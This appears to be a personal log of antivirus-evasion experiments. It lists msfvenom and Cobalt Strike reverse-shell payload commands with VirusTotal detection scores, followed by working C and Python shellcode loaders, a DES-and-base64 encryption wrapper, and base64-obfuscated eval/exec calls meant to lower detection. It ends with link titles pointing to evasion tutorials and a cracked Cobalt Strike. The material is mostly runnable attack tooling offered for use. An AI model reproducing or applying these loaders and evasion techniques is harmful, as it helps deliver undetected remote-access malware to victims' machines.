Log of Anti-AntiVirus

Bypass 4 Fun

Payloads	VirusTotal	Remark
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=9876 -f exe > Bufferfly.exe	53/69
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 16 LHOST=192.168.56.103 LPORT=9876 -f exe > Bufferfly.exe	52/69
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=9876 -f c > Bufferfly.c	20/69	Visual Studio编译生成32位可执行程序
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 16 LHOST=192.168.56.103 LPORT=9876 -f c > Bufferfly.c	13/69	Visual Studio编译生成32位可执行程序
msfvenom -p windows/x64/meterpreter/reverse_tcp -e LHOST=192.168.56.103 LPORT=9876 -f py > Bufferfly.py	23/69	Payload需要与Python版本相匹配
msfvenom -p windows/x64/meterpreter/reverse_tcp -e LHOST=192.168.56.103 LPORT=9876 -f py > Bufferfly.py DES	15/70	Payload需要与Python版本相匹配 pyinstaller -F -w -p PATH_TO_PAKEAGE shellcode.py (Cryptodome)
msfvenom -p windows/x64/meterpreter/reverse_tcp -e LHOST=192.168.56.103 LPORT=9876 -f py > Bufferfly.py DES BASE64	11/69	Payload需要与Python版本相匹配 pyinstaller -F -w -p PATH_TO_PAKEAGE shellcode.py (Cryptodome)
CobaltStrike windows/beacon_http/reverse_http x86 EXE	50/67
CobaltStrike windows/beacon_http/reverse_http x86 C	27/70	Visual Studio编译生成32位可执行程序
CobaltStrike windows/beacon_http/reverse_http x64 Python	23/68	Payload需要与Python版本相匹配
CobaltStrike windows/beacon_http/reverse_http x64 Python DES BASE64	10/68	Payload需要与Python版本相匹配 pyinstaller -F -w -p PATH_TO_PAKEAGE shellcode.py (Cryptodome)

unsigned char buf[] = "shellcode";
main()
{
    LPVOID shellcode = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    memcpy(shellcode, buf, sizeof(buf));
    ((void(*)())shellcode)();
}

import ctypes
buf = b"shellcode"
shellcode = bytearray(buf)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

#encrypt.py
from Cryptodome.Cipher import DES
import base64
buf = b"shellcode"
key = b'DEADC0DE'
des = DES.new(key, DES.MODE_ECB)
pad = (8 - len(buf) % 8) * b"\x00"
b64code = base64.b64encode(des.encrypt(buf + pad))
print(b64code)
print(len(buf))
#---------------------------
#shellcode.py
from Cryptodome.Cipher import DES
import base64
import ctypes
b64code = b"base64code"
length = 510
key = b"DEADC0DE"
des = DES.new(key, DES.MODE_ECB)
buf = des.decrypt(base64.b64decode(b64code))[:length]
shellcode = bytearray(buf)
ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_uint64(ptr),buf,ctypes.c_int(len(shellcode)))
#eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))
handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64(ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
#exec(base64.b64decode("aGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoY3R5cGVzLmNfaW50KDApLGN0eXBlcy5jX2ludCgwKSxjdHlwZXMuY191aW50NjQocHRyKSxjdHlwZXMuY19pbnQoMCksY3R5cGVzLmNfaW50KDApLGN0eXBlcy5wb2ludGVyKGN0eXBlcy5jX2ludCgwKSkp"))
ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

Python執行pyinstaller產生的執行檔出現No module錯誤訊息
python3 shellcode 使用eval函数 bypass AV
对于python中eval函数不能执行赋值操作的解决方法
实验使用 C 编译 shellcode 免杀上线
python3的Cryptodome
Cobalt Strike系列教程第一章：简介与安装
CS teamserver.bat
Cobalt Strike 4.3破解版